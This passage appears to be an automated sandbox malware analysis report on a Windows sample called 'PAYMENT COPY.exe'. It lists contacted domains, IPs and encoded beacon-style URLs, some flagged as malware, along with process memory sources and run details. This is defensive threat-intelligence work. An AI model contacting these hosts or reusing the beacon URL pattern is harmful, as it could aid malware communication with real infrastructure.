http://www.embrace-counselor.com/5xhc/?VlEHDVvh=MlmeOAVABHl7V7JWE669wIJbTLHKaUkhN9NjdS3PgsP7eMcTlCivolpOMqUU2YL5bEhebrvuWwjxxfDDk/ZIeLQ1wF+hSOQ+omIdi18JN7A0f8vC6TD737s=&BHPD=o2nt	0%	Avira URL Cloud	safe
https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)	0%	Avira URL Cloud	safe
https://www.reg.ru/support/#request	0%	Avira URL Cloud	safe
https://www.instagram.com/hover_domains	0%	Virustotal		Browse
https://www.google.com	0%	Avira URL Cloud	safe
http://www.drdavidglassman.com/rydx/?VlEHDVvh=yFQmHiiKcR7mSVWuRw8RQpo4LJVZTLcWi6hJF+Rn4pNF9HaZnauVsiHAA7JcJP010hHBzc/zc7n9tAOpAjixnZqk0gAODdt0gSRPUe/o9m+q8oWrf5RESRg=&BHPD=o2nt	100%	Avira URL Cloud	malware
https://files.reg.ru/fonts/inter/Inter-Regular.woff)	0%	Avira URL Cloud	safe
https://tilda.cc	1%	Virustotal		Browse
https://server5.hosting.reg.ru/manager	0%	Avira URL Cloud	safe
https://www.reg.ru/support/#request	0%	Virustotal		Browse
https://www.hover.com/domains/results	0%	Avira URL Cloud	safe
http://www.pinpointopia.com/w8kk/	0%	Avira URL Cloud	safe
https://www.zoho.com/sites/?src=parkeddomain&dr=www.topscaleservices.com	0%	Avira URL Cloud	safe
http://www.supermontage.com/9i8t/	0%	Avira URL Cloud	safe
http://www.pinpointopia.com/w8kk/?VlEHDVvh=xApCedPshlFqhM+jKZfmvnpl71z0cBQVdhsyYTPYXO8jvxnjhAjWxt0ri1XYL1kB/lDsxIYle23q9eZueg3dcjYKciZZWPOZx8TMcQAQa9bvKBBzdKnYGI4=&BHPD=o2nt	0%	Avira URL Cloud	safe
https://www.hover.com/domains/results	0%	Virustotal		Browse
https://www.google.com	0%	Virustotal		Browse
http://www.celluslim.com.br/y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA+vQb38eHFgRBz6unIHe4HBIxzvdSvdhO03jK4wsowAz3gHYbTW35gnt1fPF07v4JZ2cMipkMMw/S8lqxq9gNP1PGwmWBqthC4=&BHPD=o2nt	0%	Avira URL Cloud	safe
https://server5.hosting.reg.ru/manager	0%	Virustotal		Browse
http://arsenjev.fun/oqq6/?VlEHDVvh=rwgwPlALEUzYU2aVnuvDPIeIRMF/prMxeEAjcX/DBUkDQJY	0%	Avira URL Cloud	safe
http://www.spotgush.top/ni9v/?VlEHDVvh=1qDi8Q0JYC/+jowmm6vhnz1nUg+FzSnwkBEF+9sZfgdAuqPr9wV9FjKgoqnVlqm9IHxz/wQEEdcJ3vr/ooFd412OQCGzSxMe6/jXu+QS8SjFcrOZORUu8fo=&BHPD=o2nt	0%	Avira URL Cloud	safe
http://www.topscaleservices.com/uyud/	0%	Avira URL Cloud	safe
http://www.spotgush.top/ni9v/	0%	Avira URL Cloud	safe
https://twitter.com/hover	0%	Avira URL Cloud	safe
https://twitter.com/hover	0%	Virustotal		Browse
http://www.arsenjev.fun/oqq6/?VlEHDVvh=rwgwPlALEUzYU2aVnuvDPIeIRMF/prMxeEAjcX/DBUkDQJY+y8rHCEXmR7eGsa/wgYTHR39WGVXgcrNwnNHcmkfubB89b8ls2WhHljXtxKg/z1p/kKzkfHY=&BHPD=o2nt	0%	Avira URL Cloud	safe
http://www.drdavidglassman.com/rydx/	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://files.reg.ru/fonts/inter/Inter-Medium.woff2)	0%	Avira URL Cloud	safe
http://www.chooceseafood.ca/ru1k/	0%	Avira URL Cloud	safe
http://www.shy-models.ru/spev/	0%	Avira URL Cloud	safe
https://2domains.ru	0%	Avira URL Cloud	safe
http://embrace-counselor.com/5xhc/?VlEHDVvh=MlmeOAVABHl7V7JWE669wIJbTLHKaUkhN9NjdS3PgsP7eMcTlCivolpO	0%	Avira URL Cloud	safe
http://www.drednents.es	0%	Avira URL Cloud	safe
https://ovipanel.in/tutorials	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)	0%	Avira URL Cloud	safe
http://www.drednents.es	1%	Virustotal		Browse
http://www.knockdubai.ae/s5gg/?VlEHDVvh=Lex3y3SP4nMuJeMgNnltykKJrtse07Leq1Ynk5nBUbN+LWWMQkpVzy+EMOTic1Ks5WEW61I3b9noLb4lZz3/VBahdTtzKpjYDK5Fm2hl+YH8rBOlCQe91Nk=&BHPD=o2nt	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://2domains.ru	0%	Virustotal		Browse
http://www.drednents.es/9bwj/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://ovipanel.in/tutorials	0%	Virustotal		Browse
http://mediciconstanta.ro/jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZ	0%	Avira URL Cloud	safe
http://www.drednents.es/9bwj/?VlEHDVvh=+7XJqbUQcguxa/KcUhsZdHSIPDv12M145Gf+kZkuNm6BJEH5M4YG3TEKS2nGgF42YhScJBjRA7U3xzFEvpUC1m9E0lF3kGvEoHdRMqPZgXJQjJurfTYwuhc=&BHPD=o2nt	0%	Avira URL Cloud	safe
https://files.reg.ru/fonts/inter/Inter-Medium.woff)	0%	Avira URL Cloud	safe
https://codepen.io/uzcho_/pens/popular/?grid_type=list	0%	Avira URL Cloud	safe
https://ovipanel.in/	0%	Avira URL Cloud	safe
https://codepen.io/uzcho_/pen/eYdmdXw.css	0%	Avira URL Cloud	safe
http://www.mediciconstanta.ro/jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZN6Oos26YiOKjRaUape58pdui5fF9pfPUX5VWYS5msIkgnGD14mtGY1feIQ7U=&BHPD=o2nt	0%	Avira URL Cloud	safe
http://www.celluslim.com.br/y8lu/	0%	Avira URL Cloud	safe
https://files.reg.ru/fonts/inter/Inter-Regular.woff2)	0%	Avira URL Cloud	safe
https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404	0%	Avira URL Cloud	safe
http://www.supermontage.com/9i8t/?VlEHDVvh=2T5+pGPdigXxZZx8gY/OSLODLjvvwj0MjlV7S+1Ldbgia1Gm71jO+3C1ccfYbIwVvCUgnk/aeboESokRLTli2QWqQswZxn4Hxw0zC18njeajG3czp+Bsx3U=&BHPD=o2nt	0%	Avira URL Cloud	safe
https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb	0%	Avira URL Cloud	safe
http://www.topscaleservices.com/uyud/?VlEHDVvh=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af/SljyarCQCdkJfuLPpdjFvVaxfdqpU=&BHPD=o2nt	0%	Avira URL Cloud	safe
http://www.embrace-counselor.com/5xhc/	0%	Avira URL Cloud	safe
https://reg.ru?target=_blank	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mediciconstanta.ro	89.42.218.92	true	false		unknown
www.arsenjev.fun	217.107.219.102	true	false		unknown
shy-models.ru	185.215.4.44	true	false		unknown
www.spotgush.top	66.29.149.46	true	false		unknown
www.chooceseafood.ca	199.59.243.225	true	false	0%, Virustotal, Browse	unknown
www.drednents.es	172.67.137.210	true	false	1%, Virustotal, Browse	unknown
www.pinpointopia.com	216.40.34.41	true	false	0%, Virustotal, Browse	unknown
celluslim.com.br	50.116.86.54	true	false	0%, Virustotal, Browse	unknown
www.supermontage.com	13.248.169.48	true	false	0%, Virustotal, Browse	unknown
zhs.zohosites.com	136.143.186.12	true	false	0%, Virustotal, Browse	unknown
www.drdavidglassman.com	199.59.243.225	true	false	0%, Virustotal, Browse	unknown
www.embrace-counselor.com	202.233.67.46	true	false		unknown
knockdubai.ae	103.120.178.210	true	false	0%, Virustotal, Browse	unknown
www.skinut-ves.ru	31.31.198.106	true	false		unknown
www.digishieldu.online	unknown	unknown	true		unknown
www.mediciconstanta.ro	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.knockdubai.ae	unknown	unknown	true		unknown
www.shy-models.ru	unknown	unknown	true		unknown
www.celluslim.com.br	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.topscaleservices.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.onitango-test.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.mediciconstanta.ro/jaeg/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.knockdubai.ae/s5gg/	false	Avira URL Cloud: safe	unknown
http://www.skinut-ves.ru/pf45/?VlEHDVvh=+FYLzbf4tuJqmfBE/IGOfF0r+MHgP4o87eLDAHdmTpq2bw1UrUMWUoU66GOKJ7n5AfomTNLEJ4yDFS4nbynVDFN+PHUTvroy3xH/fpiwWIz3Kb5ThfITUHU=&BHPD=o2nt	false	Avira URL Cloud: malware	unknown
http://www.shy-models.ru/spev/?VlEHDVvh=tbEztHv7aRBF16/vS4ReUtdihzrMDj2O7MCPG/vC1Jml0QkKRnSSU8sUdUNE92nxSgZvf0qXlo0KJW6hnlqWydczzuvw5M1cQ8Ki08JizjbM/1/wqRnw39c=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.arsenjev.fun/oqq6/	false	Avira URL Cloud: safe	unknown
http://www.embrace-counselor.com/5xhc/?VlEHDVvh=MlmeOAVABHl7V7JWE669wIJbTLHKaUkhN9NjdS3PgsP7eMcTlCivolpOMqUU2YL5bEhebrvuWwjxxfDDk/ZIeLQ1wF+hSOQ+omIdi18JN7A0f8vC6TD737s=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.drdavidglassman.com/rydx/?VlEHDVvh=yFQmHiiKcR7mSVWuRw8RQpo4LJVZTLcWi6hJF+Rn4pNF9HaZnauVsiHAA7JcJP010hHBzc/zc7n9tAOpAjixnZqk0gAODdt0gSRPUe/o9m+q8oWrf5RESRg=&BHPD=o2nt	false	Avira URL Cloud: malware	unknown
http://www.pinpointopia.com/w8kk/	false	Avira URL Cloud: safe	unknown
http://www.supermontage.com/9i8t/	false	Avira URL Cloud: safe	unknown
http://www.pinpointopia.com/w8kk/?VlEHDVvh=xApCedPshlFqhM+jKZfmvnpl71z0cBQVdhsyYTPYXO8jvxnjhAjWxt0ri1XYL1kB/lDsxIYle23q9eZueg3dcjYKciZZWPOZx8TMcQAQa9bvKBBzdKnYGI4=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.celluslim.com.br/y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA+vQb38eHFgRBz6unIHe4HBIxzvdSvdhO03jK4wsowAz3gHYbTW35gnt1fPF07v4JZ2cMipkMMw/S8lqxq9gNP1PGwmWBqthC4=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.spotgush.top/ni9v/?VlEHDVvh=1qDi8Q0JYC/+jowmm6vhnz1nUg+FzSnwkBEF+9sZfgdAuqPr9wV9FjKgoqnVlqm9IHxz/wQEEdcJ3vr/ooFd412OQCGzSxMe6/jXu+QS8SjFcrOZORUu8fo=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.spotgush.top/ni9v/	false	Avira URL Cloud: safe	unknown
http://www.topscaleservices.com/uyud/	false	Avira URL Cloud: safe	unknown
http://www.arsenjev.fun/oqq6/?VlEHDVvh=rwgwPlALEUzYU2aVnuvDPIeIRMF/prMxeEAjcX/DBUkDQJY+y8rHCEXmR7eGsa/wgYTHR39WGVXgcrNwnNHcmkfubB89b8ls2WhHljXtxKg/z1p/kKzkfHY=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.drdavidglassman.com/rydx/	false	Avira URL Cloud: malware	unknown
http://www.chooceseafood.ca/ru1k/	false	Avira URL Cloud: safe	unknown
http://www.shy-models.ru/spev/	false	Avira URL Cloud: safe	unknown
http://www.knockdubai.ae/s5gg/?VlEHDVvh=Lex3y3SP4nMuJeMgNnltykKJrtse07Leq1Ynk5nBUbN+LWWMQkpVzy+EMOTic1Ks5WEW61I3b9noLb4lZz3/VBahdTtzKpjYDK5Fm2hl+YH8rBOlCQe91Nk=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.drednents.es/9bwj/	false	Avira URL Cloud: safe	unknown
http://www.drednents.es/9bwj/?VlEHDVvh=+7XJqbUQcguxa/KcUhsZdHSIPDv12M145Gf+kZkuNm6BJEH5M4YG3TEKS2nGgF42YhScJBjRA7U3xzFEvpUC1m9E0lF3kGvEoHdRMqPZgXJQjJurfTYwuhc=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.mediciconstanta.ro/jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZN6Oos26YiOKjRaUape58pdui5fF9pfPUX5VWYS5msIkgnGD14mtGY1feIQ7U=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.celluslim.com.br/y8lu/	false	Avira URL Cloud: safe	unknown
http://www.supermontage.com/9i8t/?VlEHDVvh=2T5+pGPdigXxZZx8gY/OSLODLjvvwj0MjlV7S+1Ldbgia1Gm71jO+3C1ccfYbIwVvCUgnk/aeboESokRLTli2QWqQswZxn4Hxw0zC18njeajG3czp+Bsx3U=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.topscaleservices.com/uyud/?VlEHDVvh=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af/SljyarCQCdkJfuLPpdjFvVaxfdqpU=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.embrace-counselor.com/5xhc/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.instagram.com/hover_domains	gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://celluslim.com.br/y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA	gpresult.exe, 0000000D.00000002.4949275030.00000000058EC000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.000000000311C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.zoho.com/sites/images/professionally-crafted-themes.png	gpresult.exe, 0000000D.00000002.4949275030.0000000005F34000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003764000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://tilda.cc	gpresult.exe, 0000000D.00000002.4949275030.0000000006258000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003A88000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)	gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/support/#request	gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com	gpresult.exe, 0000000D.00000002.4949275030.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4949275030.0000000005DA2000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000035D2000.00000004.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003C1A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://files.reg.ru/fonts/inter/Inter-Regular.woff)	gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://server5.hosting.reg.ru/manager	firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.hover.com/domains/results	gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://help.yahoo.com/help/us/ysearch/slurp)	firefox.exe, 00000015.00000002.2995518665.0000022CE0647000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.zoho.com/sites/?src=parkeddomain&dr=www.topscaleservices.com	gpresult.exe, 0000000D.00000002.4949275030.0000000005F34000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003764000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://arsenjev.fun/oqq6/?VlEHDVvh=rwgwPlALEUzYU2aVnuvDPIeIRMF/prMxeEAjcX/DBUkDQJY	gpresult.exe, 0000000D.00000002.4949275030.000000000670E000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003F3E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PAYMENT COPY.exe, 00000000.00000002.2533735026.0000000002ABF000.00000004.00000800.00020000.00000000.sdmp, bQrgcvrrXfGN.exe, 0000000A.00000002.2583123320.0000000002F28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://twitter.com/hover	gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://files.reg.ru/fonts/inter/Inter-Medium.woff2)	gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2domains.ru	gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://embrace-counselor.com/5xhc/?VlEHDVvh=MlmeOAVABHl7V7JWE669wIJbTLHKaUkhN9NjdS3PgsP7eMcTlCivolpO	gpresult.exe, 0000000D.00000002.4949275030.00000000068A0000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000040D0000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.drednents.es	JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4950914597.0000000004B70000.00000040.80000000.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ovipanel.in/tutorials	gpresult.exe, 0000000D.00000002.4949275030.000000000657C000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003DAC000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)	gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mediciconstanta.ro/jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZ	gpresult.exe, 0000000D.00000002.4949275030.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://files.reg.ru/fonts/inter/Inter-Medium.woff)	gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://codepen.io/uzcho_/pens/popular/?grid_type=list	gpresult.exe, 0000000D.00000002.4949275030.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003440000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ovipanel.in/	gpresult.exe, 0000000D.00000002.4949275030.000000000657C000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003DAC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://codepen.io/uzcho_/pen/eYdmdXw.css	gpresult.exe, 0000000D.00000002.4949275030.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003440000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://files.reg.ru/fonts/inter/Inter-Regular.woff2)	gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404	gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb	gpresult.exe, 0000000D.00000002.4949275030.0000000005F34000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003764000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reg.ru?target=_blank	gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.supermontage.com	United States	16509	AMAZON-02US	false
136.143.186.12	zhs.zohosites.com	United States	2639	ZOHO-ASUS	false
103.120.178.210	knockdubai.ae	India	17439	NETMAGIC-APNetmagicDatacenterMumbaiIN	false
89.42.218.92	mediciconstanta.ro	Romania	205275	ROMARGRO	false
172.67.137.210	www.drednents.es	United States	13335	CLOUDFLARENETUS	false
66.29.149.46	www.spotgush.top	United States	19538	ADVANTAGECOMUS	false
199.59.243.225	www.chooceseafood.ca	United States	395082	BODIS-NJUS	false
50.116.86.54	celluslim.com.br	United States	46606	UNIFIEDLAYER-AS-1US	false
217.107.219.102	www.arsenjev.fun	Russian Federation	8342	RTCOMM-ASRU	false
202.233.67.46	www.embrace-counselor.com	Japan	4675	U-NETSURFUNIADEXLTDJP	false
185.215.4.44	shy-models.ru	Denmark	50129	TVHORADADAES	false
31.31.198.106	www.skinut-ves.ru	Russian Federation	197695	AS-REGRU	false
216.40.34.41	www.pinpointopia.com	Canada	15348	TUCOWSCA	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447913
Start date and time:	2024-05-27 12:18:22 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PAYMENT COPY.exe
Detection:	MAL
